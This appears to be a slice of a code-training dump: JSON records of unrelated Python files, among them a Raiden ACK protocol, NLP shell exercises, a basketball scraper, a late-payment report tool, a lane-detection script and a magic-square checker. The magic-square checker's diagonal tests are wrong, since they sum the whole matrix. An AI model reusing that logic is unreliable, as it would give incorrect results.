isinstance(message, (Ack, BaseError)):\n raise ValueError('Use send_Ack only for Ack messages or Erorrs')\n\n host_port = self.discovery.get(receiver_address)\n data = message.encode()\n msghash = sha3(data)\n\n log.info('SENDING ACK {} > {} : [{}] [echo={}] {}'.format(\n pex(self.raiden.address),\n pex(receiver_address),\n pex(msghash),\n pex(message.echo),\n message,\n ))\n\n self.transport.send(self.raiden, host_port, data)\n self.sent_acks[message.echo] = (receiver_address, message)\n\n def receive(self, data):\n # ignore large packets\n if len(data) > self.max_message_size:\n log.error('receive packet larger than maximum size', length=len(data))\n return\n\n msghash = sha3(data)\n\n # check if we handled this message already, if so repeat Ack\n if msghash in self.sent_acks:\n return self.send_ack(*self.sent_acks[msghash])\n\n # We ignore the sending endpoint as this can not be known w/ UDP\n message = decode(data)\n\n if isinstance(message, Ack):\n # we might receive the same Ack more than once\n if message.echo in self.number_of_tries:\n log.info('ACK RECEIVED {} [echo={}]'.format(\n pex(self.raiden.address),\n pex(message.echo)\n ))\n\n del self.number_of_tries[message.echo]\n else:\n log.info('DUPLICATED ACK RECEIVED {} [echo={}]'.format(\n pex(self.raiden.address),\n pex(message.echo)\n ))\n else:\n # message may not have been decoded\n if message is not None:\n assert isinstance(message, Secret) or message.sender\n self.raiden.on_message(message, msghash)\n","sub_path":"raiden/raiden_protocol.py","file_name":"raiden_protocol.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"306748899","text":"#!/usr/bin/env python2\n# Copyright 2013-present Barefoot Networks, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nquiet = False\n\ndef log(*items):\n if quiet != True:\n print(*items)\n\ndef run_command(command):\n log('>', command)\n return os.WEXITSTATUS(os.system(command))\n\ndef main():\n args = sys.argv[1:]\n rc = run_command(\"python /p4app/main.py \" + ' '.join(args))\n\n sys.exit(rc)\n\nif __name__ == '__main__':\n main()\n","sub_path":"docker/scripts/p4apprunner.py","file_name":"p4apprunner.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"72635465","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport subprocess\n\nfilename = \"hightemp.txt\"\n#10\nwith open(filename, \"r\") as f:\n data =f.readlines()\n print(\"10: hightemp.txtは\"+str(len(data))+\"行です。\")\nos.system(\"wc -l hightemp.txt\")\nprint(\"\\n\\n\\n\\n\\n\")\n#11\nwith open(filename, \"r\") as f:\n data =f.readlines()\n data = [line.replace(\" \", \"\\t\") for line in data]\n print(\">>>11\")\n print(str(data))\nos.system('cat hightemp.txt |tr \" \" \"\\t\" ' )\nprint(\"\\n\\n\\n\\n\\n\")\n\n#12\nwith open(filename,\"r\") as f:\n data = f.readlines()\n data =[line.split(\"\\t\") for line in data]\n print(data)\n col1 = [line[0] for line in data]\n col2 = [line[1] for line in data]\n print(\"12:\\n\"+\"\\n\".join(col1))\n print(\"12:\\n\"+\"\\n\".join(col2))\n\n\nos.system('cat hightemp.txt | cut -f1 >col1.txt')\nos.system('cat hightemp.txt | cut -f2 >col2.txt')\nprint(\"\\n\\n\\n\\n\\n\")\n\n#13\nwith open(\"col1.txt\",\"r\") as f:\n data1 = f.readlines()\nwith open(\"col2.txt\",\"r\") as f:\n data2 = f.readlines()\ndata = [col1+\"\\t\"+col2 for col1,col2 in zip(data1,data2)]\nprint(data)\nos.system('paste -d\"\\t\" col1.txt col2.txt')\n\n#14 #15\nprint (\"Plase input the number of output lines.\")\nN = int(input())\nwith open(filename,\"r\") as f:\n data = f.readlines()\nprint(data[0:N])\nos.system('cat hightemp.txt |head -n'+str(N) )\nprint(data[-N:])\nos.system('cat hightemp.txt |tail -n'+str(N) )\n\n#16\nprint(\"please input the number of split\")\nN = int(input())\n\nos.system(\"LINE=`cat hightemp.txt|wc -l` ; VAR=`expr $LINE / {}` ;cat hightemp.txt|split -l $VAR\".format(N))\n\n\n\n#17\nos.system('cat hightemp.txt | cut -f1 |sort|uniq')\n\n#18\nos.system('cat hightemp.txt |LANG=ja_JP.UTF-8 sort -k3')\n#19\n\nos.system(' cat hightemp.txt |cut -f1 | LANG=ja_JP.UTF-8 sort |LANG=ja_JP.UTF-8 uniq |sort -k1 -n')\nos.system('cat hightemp.txt |cut -f1 | LANG=ja_JP.UTF-8 sort |LANG=ja_JP.UTF-8 uniq -c |sort -k1 -n -r')","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"340097940","text":"import sys\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef plot(input_csv):\n analysis = pd.read_csv(input_csv)\n alpha_primes = analysis['learning_factor'].unique()\n\n mins = {\n 'dest_reached_rate': min(analysis['dest_reached_rate']),\n 'mean_normed_time_left': min(analysis['mean_normed_time_left']),\n 'mean_normed_n_penalties': min(analysis['mean_normed_n_penalties']),\n 'mean_normed_cumulative_reward': min(analysis['mean_normed_cumulative_reward']),\n }\n maxs = {\n 'dest_reached_rate': max(analysis['dest_reached_rate']),\n 'mean_normed_time_left': max(analysis['mean_normed_time_left']),\n 'mean_normed_n_penalties': max(analysis['mean_normed_n_penalties']),\n 'mean_normed_cumulative_reward': max(analysis['mean_normed_cumulative_reward']),\n }\n\n for alpha_prime in alpha_primes:\n data = analysis[analysis['learning_factor'].isin([alpha_prime])]\n \n x_axis = data['discount_factor'].unique()\n y_axis = data['exploration_rate'].unique()\n\n dest_reached_rate = data['dest_reached_rate'].reshape(len(x_axis), len(y_axis))\n mean_normed_time_left = data['mean_normed_time_left'].reshape(len(x_axis), len(y_axis))\n mean_normed_n_penalties = data['mean_normed_n_penalties'].reshape(len(x_axis), len(y_axis))\n mean_normed_cumulative_reward = data['mean_normed_cumulative_reward'].reshape(len(x_axis), len(y_axis))\n\n fig, axes = plt.subplots(2, 2, figsize=(18,15))\n\n sns.heatmap(dest_reached_rate, ax=axes[0,0], xticklabels=x_axis.round(2), yticklabels=y_axis.round(2), vmin=mins['dest_reached_rate'], vmax=maxs['dest_reached_rate'])\n axes[0,0].set_title(\"Destination reached\\nsuccess rate\")\n sns.heatmap(mean_normed_time_left, ax=axes[0,1], xticklabels=x_axis.round(2), yticklabels=y_axis.round(2), vmin=mins['mean_normed_time_left'], vmax=maxs['mean_normed_time_left'])\n axes[0,1].set_title(\"Mean normalized time\\nleft to destination\")\n sns.heatmap(mean_normed_n_penalties, ax=axes[1,0], xticklabels=x_axis.round(2), yticklabels=y_axis.round(2), vmin=mins['mean_normed_n_penalties'], vmax=maxs['mean_normed_n_penalties'])\n axes[1,0].set_title(\"Mean normalized no. of\\npenalties incurred\")\n sns.heatmap(mean_normed_cumulative_reward, ax=axes[1,1], xticklabels=x_axis.round(2), yticklabels=y_axis.round(2), vmin=mins['mean_normed_cumulative_reward'], vmax=maxs['mean_normed_cumulative_reward'])\n axes[1,1].set_title(\"Mean normalized\\ncumulative rewards\")\n \n for ax in axes.flat:\n plt.setp(ax.get_xticklabels(), rotation=90)\n plt.setp(ax.get_yticklabels(), rotation=0)\n ax.set_xlabel(\"Discount factor\")\n ax.set_ylabel(\"Exploration rate\")\n \n fig.tight_layout()\n fig.savefig(\"plots_learning_{:.1f}.png\".format(alpha_prime))\n\nif __name__ == \"__main__\":\n # No error checks; use carefully\n plot(sys.argv[1])","sub_path":"analysis/plot_measurements.py","file_name":"plot_measurements.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"468231857","text":"from bs4 import BeautifulSoup\nimport requests\nimport numpy as np\nimport re\n\nDATA_DIR = '../../data'\n\n\ndef build_players_map():\n players_map = {}\n\n base_url = 'https://www.basketball-reference.com'\n page_link = base_url + '/teams/'\n page_response = requests.get(page_link, timeout=5)\n page_content = BeautifulSoup(page_response.content, \"html.parser\")\n\n active_teams_table = page_content.find('table', {'id': 'teams_active'})\n active_teams = active_teams_table.find_all(\n 'a', {'href': lambda x: re.match(r'/teams/[A-Z ]+/', x)})\n for team in active_teams:\n team_abrv = fix_team_abrv(team['href'].split('/')[2])\n team_link = base_url + '/teams/' + team_abrv + '/2019.html'\n roster_map = build_roster_map(team_link)\n players_map = {**players_map, **roster_map}\n\n return players_map\n\n\ndef build_roster_map(team_link):\n roster_map = {}\n\n page_response = requests.get(team_link, timeout=5)\n page_content = BeautifulSoup(page_response.content, \"html.parser\")\n\n roster_table = page_content.find('table', {'id': 'roster'})\n trs = roster_table.find(\"tbody\").find_all(\"tr\")\n for tr in trs:\n # number = tr.find('th', {'data-stat': 'number'}).text\n player = tr.find('td', {'data-stat': 'player'})['csk']\n pos = tr.find('td', {'data-stat': 'pos'})['csk']\n roster_map[player] = pos\n\n return roster_map\n\n\ndef fix_team_abrv(team_abrv):\n if team_abrv == 'NJN':\n team_abrv = 'BRK'\n elif team_abrv == 'CHA':\n team_abrv = 'CHO'\n elif team_abrv == 'NOH':\n team_abrv = 'NOP'\n return team_abrv\n\n\nplayers_map = build_players_map()\nnp.save(DATA_DIR + 'data/players_map.npy', players_map)\n","sub_path":"src/scraper/build_players_map.py","file_name":"build_players_map.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"123033601","text":"magic = None\n\n\ndef check_magic(magic_arr, magic_order):\n global magic\n sum1 = sum(magic_arr[0])\n # print(magic_arr[0][1])\n # check for row sum euality(iteration over rows)\n for i in range(magic_order):\n sum_row = sum(magic_arr[i])\n if sum1 != sum_row:\n magic = False\n break\n else:\n magic = True\n\n #check for column sum equality (iteration over columns\n for j in range(magic_order):\n sum_list_col = []\n for i in range(magic_order):\n # print(magic_arr[i][j])\n sum_list_col.append(magic_arr[i][j])\n sum_col = sum(sum_list_col)\n if sum1 != sum_col:\n magic = False\n break\n else:\n magic = True\n\n\n # diagonal sum euality (principle diagonal)\n\n sum_list_col = []\n for i in range(magic_order):\n for j in range(magic_order):\n sum_list_col.append(magic_arr[i][j])\n\n\n if sum(sum_list_col) == sum1:\n magic = True\n else:\n magic = False\n\n #diagonal sum equality (opposite to principle diagonal)\n sum_list_col = []\n for i in range(magic_order):\n for j in range(magic_order):\n sum_list_col.append(magic_arr[magic_order-i-1][magic_order-j-1])\n\n if sum(sum_list_col) == sum1:\n magic = True\n else:\n magic = False\n\n\n\n if magic:\n print('magic')\n\n\n\nnum_rows = int(input(\"enter number of your magic matrix\"))\nnums_of_magic = []\nfor i in range(num_rows):\n nums = input('enter your {i + 1}th line')\n nums_of_magic.append([int(x) for x in nums.split()])\n\ncheck_magic(nums_of_magic, num_rows)\n","sub_path":"magic matrix.py","file_name":"magic matrix.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"165283192","text":"#######################################################\n## Author: Ashish Anand\n## Date: 15 Dec 2011\n## Intent: To read bills.xlsx and check who has made late payment as per his trackrecord.\n## Requirement: Python 3 Interpretor must be installed\n## Openpyxl for Python 3 must be installed\n#######################################################\n\nfrom Util.Config import GetOption\nfrom Util.Decorators import timeThisFunction\nfrom Util.Exception import MyException\nfrom Util.HTML import Html, Body, UnderLine, Table, tr, td\nfrom Util.Misc import PrintInBox, OpenFileForViewing\n\nfrom whopaid.customers_info import GetAllCustomersInfo\nfrom whopaid.sanity_checks import CheckConsistency\nfrom whopaid.util_whopaid import CompaniesDict, GetAllCompaniesDict,\\\n SelectUnpaidBillsFrom, floatx ,TotalAmountDueForThisCompany\n\nimport os\nimport argparse\n\nGRACEPERIOD = int(GetOption(\"CONFIG_SECTION\", \"GracePeriodInDays\"))\nDEFAULT_PAYMENT = int(GetOption(\"CONFIG_SECTION\", \"DefaultPaymentInDays\"))\nANOMALY_STANDARD_DEVIATION = float(GetOption(\"CONFIG_SECTION\", \"AnomalyStandardDeviation\"))\nFILE_PATH_TXT = os.path.join(os.path.expandvars(\"%temp%\"), \"PaymentChaseUpList.txt\")\nFILE_PATH_HTML = os.path.join(os.path.expandvars(\"%temp%\"), \"PaymentChaseUpList.html\")\n\nclass CandidateCompaniesDict(CompaniesDict):\n \"\"\"This class represents the resultant companies of WhoPaid() operation, i.e companies who can pay the particular amount.\n It is basically a dictonary just like the base class. Key is company and value is its bills that has been paid\"\"\"\n def __init__(self):\n super(CandidateCompaniesDict, self).__init__()\n\n def __str__(self):\n \"\"\"This function contains all the formatting in which the results should be shown.\"\"\"\n result = \"\"\n if(len(self) > 0):\n for eachCompName, eachComp in self.GetAllBillsOfAllCompaniesAsDict().iteritems():\n result += \"\\n\" + str(eachCompName)\n else:\n result += \"Cannot detect who paid amount\"\n return result\n\n\n@timeThisFunction\ndef main():\n print(\"Churning Data...\")\n allBillsDict = GetAllCompaniesDict().GetAllBillsOfAllCompaniesAsDict()\n defaultersDict = FindDefaulters(allBillsDict)\n defaultedBillsDict = defaultersDict.GetAllBillsOfAllCompaniesAsDict()\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--text\", dest='text', type=str, default=None, help=\"If present, the report will be genertated in text format.\")\n parser.add_argument(\"-v\", \"--verbose\", dest='verbose', action=\"store_true\", default=False, help=\"If present, the report will be verbose.\")\n args = parser.parse_args()\n\n if args.text or args.verbose:\n filePath = FILE_PATH_TXT\n else:\n filePath = FILE_PATH_HTML\n\n with open(filePath, \"w\") as f:\n if args.text:\n f.write(\"\\n{:^60}\\n\".format(\"Payment Chase-up list\") + \"_\"*60)\n f.write(DefaultersAsStrWithLessDesc(defaultedBillsDict, allBillsDict))\n elif args.verbose:\n f.write(TotalDefaultersAmount(defaultedBillsDict))\n f.write(DefaultersAsStr(defaultedBillsDict))\n else:\n f.write(DefaultersAsHTMLWithLessDesc(defaultedBillsDict, allBillsDict))\n\n OpenFileForViewing(filePath)\n CheckConsistency()\n\n return\n\n\ndef DefaultersAsHTMLWithLessDesc(defaultedBillsDict, allBillsDict):\n \"\"\"Late Payments as HTML \"\"\"\n result = \"\\n\"\n result += UnderLine(\"

    Payment Chase-up List

    \")\n l = list(defaultedBillsDict.iteritems())\n\n YardStick = DelayInPayment\n YardStick = AmountStuckWithInterest\n\n #Sort the list of names in the order of delay in payment\n l.sort(key=lambda x:YardStick(x[1]), reverse=True)\n\n def TableRow(x, y, z):\n return tr(td(x) + td(y) + td(z))\n\n tableData = \"\"\n for i, (compName, billList) in enumerate(l):\n tableData += TableRow(i+1, compName, \"Rs.\" + str(TotalAmountDueForThisCompany(allBillsDict, compName)))\n return Html(Body(result + Table(tableData)))\n\ndef DefaultersAsStrWithLessDesc(defaultedBillsDict, allBillsDict):\n result = \"\\n\"\n l = list(defaultedBillsDict.iteritems())\n\n YardStick = DelayInPayment\n YardStick = AmountStuckWithInterest\n\n #Sort the list of names in the order of delay in payment\n l.sort(key=lambda x:YardStick(x[1]), reverse=True)\n\n for i, (compName, billList) in enumerate(l):\n result += \"\\n{:>3}. {} (Rs.{})\".format(i, compName, TotalAmountDueForThisCompany(allBillsDict, compName))\n return result\n\ndef DefaultersAsStr(defaultedBillsDict):\n result = \"\\n\"\n l = list(defaultedBillsDict.iteritems())#l contains the list of names\n\n YardStick = AmountStuckWithInterest\n YardStick = DelayInPayment\n\n #Sort the list of names in the order of delay in payment\n l.sort(key=lambda x:YardStick(x[1]), reverse=True)\n\n for eachEntry in l:\n billList = eachEntry[1]\n result += \"(\" + str(int(YardStick(billList))) + \") \"\n result += str(billList)\n return result\n\ndef TotalDefaultersAmount(defaultedBillsDict):\n amt = 0\n for eachComp in defaultedBillsDict:\n for b in defaultedBillsDict[eachComp]:\n amt += int(b.amount)\n\n return \"{:<.04} lakh is the total amount due towards defaulters\".format(str(amt/100000))\n\ndef PaymentMadeInDays(bill):\n assert bill.isPaid, \"This function should only be called on paid bills\"\n timeDelta = (bill.paymentReceivingDate - bill.invoiceDate)\n return timeDelta.days\n\ndef AveragePaymentDays(billList):\n \"\"\"Calculates the average number of days in which payment is made by a customer. Discards the anomalies\"\"\"\n\n days = 0\n ctr = 0\n for b in billList:\n if b.isPaid:\n days += PaymentMadeInDays(b)\n ctr += 1\n if ctr == 0:\n averagePaymentDays = DEFAULT_PAYMENT\n else:\n averagePaymentDays = int(days/ctr)\n\n #Discard the anomalies now\n\n days = 0\n ctr = 0\n for b in billList:\n if b.isPaid:\n creditDays = PaymentMadeInDays(b)\n allowedCreditDays = averagePaymentDays * (1 + (ANOMALY_STANDARD_DEVIATION/100))\n if creditDays < allowedCreditDays:\n days+=creditDays\n ctr += 1\n if ctr == 0:\n averagePaymentDays = DEFAULT_PAYMENT#If no bill present, assume the payment in DEFAULT_PAYMENT days\n else:\n averagePaymentDays = int(days/ctr)\n\n return averagePaymentDays\n\ndef DelayInPayment(billList):\n \"\"\"Calculates the number of days by which the payment is delayed\"\"\"\n\n trust = floatx(GetAllCustomersInfo().GetTrustForCustomer(billList[0].compName))\n if not trust:\n raise MyException(\"M/s {} have 0 trust. Please fix the database.\".format(billList[0].compName))\n\n noOfDaysSinceFirstUnpaidBill = 1\n averagePaymentDays = AveragePaymentDays(billList)\n for b in billList:\n assert b.isUnpaid, \"This function should only be called on unpaid bills\"\n delayInExpectedPayment = b.daysOfCredit - averagePaymentDays\n noOfDaysSinceFirstUnpaidBill = max(noOfDaysSinceFirstUnpaidBill, delayInExpectedPayment)\n\n return (noOfDaysSinceFirstUnpaidBill / trust)\n\ndef AmountStuckWithInterest(billList):\n \"\"\"Gives back a number indicating the amount of liability with amount also accounted for\"\"\"\n if not billList:\n return 0\n\n trust = floatx(GetAllCustomersInfo().GetTrustForCustomer(billList[0].compName))\n if not trust:\n raise MyException(\"M/s {} have 0 trust. Please fix the database.\".format(billList[0].compName))\n\n amountStuck = 0\n specifiedCreditLimit = int(GetAllCustomersInfo().GetCreditLimitForCustomer(billList[0].compName))\n historicallyPaidInTheseManyDays = AveragePaymentDays(billList)\n averagePaymentDays = (specifiedCreditLimit + historicallyPaidInTheseManyDays) / 2\n for b in billList:\n assert b.isUnpaid, \"This function should only be called on unpaid bills\"\n delayInExpectedPayment = b.daysOfCredit - averagePaymentDays\n amountStuck += (b.amount * delayInExpectedPayment) / trust\n return amountStuck\n\ndef FindDefaulters(allBillsDict):\n \"\"\"Traverse each company, create a list of all bills and see what is the average number of days in which the payment is made\"\"\"\n defaultersDict = CompaniesDict()\n for eachCompName, billList in allBillsDict.iteritems():\n averageDays = AveragePaymentDays(billList) + GRACEPERIOD\n unpaidBillsList = SelectUnpaidBillsFrom(billList)\n if len(unpaidBillsList):\n for b in unpaidBillsList:\n if b.daysOfCredit > averageDays:\n defaultersDict.AddBill(b)\n\n return defaultersDict\n\nif __name__ == '__main__':\n try:\n main()\n except MyException as ex:\n PrintInBox(str(ex))\n","sub_path":"whopaid/late_payments.py","file_name":"late_payments.py","file_ext":"py","file_size_in_byte":8687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"158980517","text":"import cv2\nimport numpy as np\nimport sys, time, logging\nimport base64\nimport multiprocessing as mp\n\n### self defined class\nfrom carViewLibV2 import runWithFPS\nfrom carViewLibV2 import landMark, traceMark\nfrom carViewLibV2 import CarView, landShift\nfrom yolo4tiny import Yoylv4Tiny\n# ### self defined class\n# from carViewLib import runWithFPS\n# from carViewLib import landMark, traceMark\n# from carViewLib import CarView, landShift\n# logging.basicConfig(level=logging.DEBUG)\nlogging.basicConfig(level=logging.WARNING)\n# logging.basicConfig(level=logging.ERROR)\n\ndef getCap():\n try:\n fileName = sys.argv[1]\n webcam = cv2.VideoCapture(fileName)\n # webcam = cv2.VideoCapture(\"http://192.168.1.103:8000\")\n logging.debug(f\"File {fileName} open success\")\n # print(f\"File {fileName} open success\")\n videoFps = webcam.get(cv2.CAP_PROP_FPS)\n # videoFrameTime = 1.0/videoFps\n logging.debug (\"Frames per second using video.get(cv2.CAP_PROP_FPS) : {:.1f}\".format(videoFps)) \n # print(\"Frames per second using video.get(cv2.CAP_PROP_FPS) : {:.1f}\".format(videoFps)) \n except IndexError:\n logging.debug(\"file open failed, try opening camera...\")\n # print(\"file open failed, try opening camera...\")\n # webcam = cv2.VideoCapture(1)\n # webcam = cv2.VideoCapture(\"http://192.168.1.109:8000\")\n webcam = cv2.VideoCapture(\"./public/images/video/realCar02.mov\")\n # webcam.set(cv2.CAP_PROP_FRAME_WIDTH, 640.0)\n # webcam.set(cv2.CAP_PROP_FRAME_HEIGHT, 480.0)\n videoFrameTime = 1.0/30.0 ### temperally set to 1/30 sec\n return webcam\n\ndef main():\n fps = runWithFPS()\n traceMarkL = traceMark()\n traceMarkR = traceMark()\n landShiftObj = landShift()\n carView = CarView()\n webcam = getCap()\n yolo = Yoylv4Tiny()\n try:\n if sys.argv[2]==\"loop\":\n isLoop = True\n except:\n isLoop = False\n num = 1500\n while num !=\"-1\": # set num = -1 to end this script\n fps.start()\n webcam.set(cv2.CAP_PROP_POS_FRAMES, num)\n readFrameT = fps.deltaTime(\"CAP_PROP_POS_FRAMES\")\n fps.start()\n ret , frame = webcam.read()\n if not ret: # end of video\n if isLoop:\n webcam.set(cv2.CAP_PROP_POS_FRAMES, 0) # red video frame from 0\n _, frame = webcam.read()\n else:\n break\n frame = cv2.resize(frame, (852, 480), interpolation=cv2.INTER_AREA)\n ### yolo4 tiny detect\n classes, confs, boxes, objPts = yolo.nnProcess(frame)\n fps.deltaTime(\"yolo process\")\n distList, warpPoints = carView.getObjDistance(objPts)\n frame = yolo.drawBox(frame, classes, confs, boxes)\n ### analysis frame and do car land recognition\n debugFrame, acm = carView.process(frame, traceMarkL, traceMarkR, landShiftObj, fps=fps, debugMode=True)\n fps.deltaTime(\"carView process\")\n ### for debug obj distance\n ### get velocity land shift and send out\n shiftVel = landShiftObj.getVelocity()\n velL = traceMarkL.getMedVelocity()\n velR = traceMarkR.getMedVelocity()\n # logging.warning(\"outside velocity: \"+str(velL)+\" \"+str(velR))\n if velL==0:\n velAve = velR\n elif velR == 0:\n velAve = velL\n else:\n velAve = (velL+velR)/2\n landPts = landShiftObj.getUnwarpPts()\n ### transfer frame to base64 image string\n # ret, jpeg = cv2.imencode('.jpg', frame)\n # rJpeg = jpeg.tobytes()\n # rJpeg = base64.b64encode(rJpeg).decode('utf-8')\n ### prepare feedback data\n outMsg = f'\"inputID\":{num}, \"landShift\": \"{shiftVel:.1f}\", \"velocity\": \"{velAve:.1f}\"'\n # outMsg += f', \"landPts\":\"{landPts}\"'\n # outMsg += f', \"classes\":\"{classes}\"'\n # outMsg += f', \"boxes\":\"{boxes}\"'\n # outMsg += f', \"confs\":\"{confs}\"'\n outMsg += f', \"distList\":\"{distList}\"'\n # outMsg += f', \"image\":\"{rJpeg}\"'\n outMsg = \"{\"+outMsg+\"}\"\n print(outMsg, flush=True)\n ### debug mode\n # debug = carView.processObjPos(acm, warpPoints)\n # debugFrame = cv2.vconcat([debugFrame,debug])\n # k = cv2.waitKey(1)\n # if k == 27 or k == ord('q'):\n # break\n # cv2.imshow(\"debug\", debugFrame)\n # if int(num) >1600:\n # break\n # cv2.imwrite(f\"./python/carView/saveImg/debug{num}.jpg\", debugFrame)\n logging.debug(\"fps.getTime(): \"+str(fps.getTime()))\n logging.debug(\"webcam.get(cv2.CAP_PROP_FPS): \"+str(webcam.get(cv2.CAP_PROP_FPS)))\n logging.debug(\"Next frame count: \"+str(int(fps.getTime() * webcam.get(cv2.CAP_PROP_FPS))))\n num+=int( fps.getTime() * webcam.get(cv2.CAP_PROP_FPS))\n fps.deltaTime(\"end process\")\nif __name__==\"__main__\":\n main()","sub_path":"python/carView/nodeLandDetectByCapVdo.py","file_name":"nodeLandDetectByCapVdo.py","file_ext":"py","file_size_in_byte":4858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"641998573","text":"import tqdm\nfrom rationale_net.utils.embedding import get_indices_tensor\nfrom rationale_net.datasets.factory import RegisterDataset\nfrom rationale_net.datasets.abstract_dataset import AbstractDataset\nimport pdb\n\nSMALL_TRAIN_SIZE = 100\n\n@RegisterDataset('SST2')\nclass StanfordSentiment(AbstractDataset):\n\n def __init__(self, args, word_to_indx, mode, max_length=90, stem='raw_data/stanford-sentiment-dataset-master/stsa.binary.'):\n self.args= args\n self.name = mode\n self.objective = args.objective\n self.dataset = []\n self.word_to_indx = word_to_indx\n self.max_length = max_length\n self.class_balance = {}\n with open(stem+self.name) as f:\n lines = f.readlines()\n lines = list(zip( range(len(lines)), lines) )\n if args.debug_mode:\n lines = lines[:SMALL_TRAIN_SIZE]\n for indx, line in tqdm.tqdm(enumerate(lines)):\n uid, line_content = line\n sample = self.processLine(line_content, indx)\n\n if not sample['y'] in self.class_balance:\n self.class_balance[ sample['y'] ] = 0\n self.class_balance[ sample['y'] ] += 1\n sample['uid'] = uid\n self.dataset.append(sample)\n f.close()\n print (\"Class balance\", self.class_balance)\n\n if args.class_balance:\n raise NotImplementedError(\"SST2 dataset doesn't support balanced sampling!\")\n\n ## Convert one line from beer dataset to {Text, Tensor, Labels}\n def processLine(self, line, i):\n if isinstance(line, bytes):\n line = line.decode()\n label = float(line[0])\n if self.objective == 'mse':\n raise NotImplementedError(\"SST2 dataset only allows binary classification\")\n else:\n self.args.num_class = 2\n text_list = line[2:].split()[:self.max_length]\n text = \" \".join(text_list)\n x = get_indices_tensor(text_list, self.word_to_indx, self.max_length)\n sample = {'text':text,'x':x, 'y':label, 'i':i}\n return sample\n","sub_path":"rationale_net/datasets/SST2_dataset.py","file_name":"SST2_dataset.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"102500953","text":"#!/usr/bin/python\n#coding: utf-8 -*-\nimport textfsm\n\n\nclass SIIBparse(object):\n\n def __init__(self, module):\n self.output_text = module.params['output_text']\n self.ip2intf = list()\n\n def parse(self):\n template = '/home/nata/day6/ansible/templates/cisco_ios_show_ip_int_brief.template'\n f = open(template, 'r')\n re_table = textfsm.TextFSM(f)\n header = re_table.header\n data = re_table.ParseText(self.output_text)\n self.ip2intf = [ dict(zip(header,v)) for v in data ]\n\n result = {\n \"IPs\": self.ip2intf\n }\n rc = 0 if len(self.ip2intf) > 0 else 1\n return rc, result\n\ndef main():\n module = AnsibleModule(\n argument_spec=dict(\n output_text=dict(required=True, type='str')\n )\n )\n siib = SIIBparse(module)\n rc, result = siib.parse()\n if rc != 0:\n module.fail_json(msg=\"Failed to parse. Incorrect input.\")\n else:\n module.exit_json(changed=False, ansible_facts=result)\n\n# import module snippets\nfrom ansible.module_utils.basic import *\nmain()\n","sub_path":"examples/day7/ansible_network/library/cisco_ip_intf_parse.py","file_name":"cisco_ip_intf_parse.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"203881144","text":"# -*- coding: UTF-8 -*-\nimport json\nimport re\nfrom optparse import OptionParser\nimport os\nimport sys\nfrom time import time\n\nimport nltk\n\n__author__ = 'CMendezC'\n\n\n# Objective: Preprocessing paper files:\n# Eliminate lines beginning with:\n# Copyright � 1997\n# © 1997 Elsevier\n# Copyright © 1998,\n# Keywords: GntR; cAMP-CRP; GntP family\n# Received 21 October 1996/Accepted 27 December 1996\n# Received 6 January 1997; accepted 5 June 1997; Received by A. Nakazawa\n# (Received 29 June 1998/Accepted 3 August 1998)\n# REFERENCES: Eisenberg, R.C., Dobrogosz, W.J., 1967 | Hung, A., Orozco, A., Zwaig, N., 1970.\n# Shine, J. & Dalgarno, L. (1974).\n# 34. Saier, M. H., T. M. Ramseier, and J. Reizer. 1996.\n# * Corresponding author. Mailing address: Department of Microbiology,\n# Phone: (614) 688-3518.\n# Fax: (614) 688-3519.\n# E-mail: conway.51@osu.edu.\n# Downloaded from\n# Selecting lines until ACKNOWLEDGMENTS or REFERENCES or Acknowledgements or References\n# Biological term detection\n\n# Parameters:\n# 1) --inputPath Path to read TXT files.\n# 2) --outputPath Path to place POST files.\n# 3) --termPath Path to read term lists\n# 4) --termFiles JSON file with terms files and length\n# 5) --termDetection If term detection is performed\n# 6) --multiDocument Processing multidocuments within input file?\n# 7) --tabFormat File with format PMID\\tNUMSENT\\tSENT\\tCLASS?\n# 8) --joinPunctuation Join separated punctuation (it comes separated from ODIN-XML files)\n\n# Output:\n# 1) preprocessed files with biological term detection\n\n# Execution:\n# GntR\n# python preprocessingTermDetection.py --inputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT\\ECK120012096_GntR\\original --outputPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\corpus\\TF_PMIDs_TXT\\ECK120012096_GntR\\preprocessed --termPath C:\\Users\\cmendezc\\Documents\\GENOMICAS\\AUTOMATIC_SUMMARIZATION_TFS\\resources\\termLists --termFiles termFilesLength.json\n\n# FhlA\n# python preprocessingTermDetection.py --inputPath 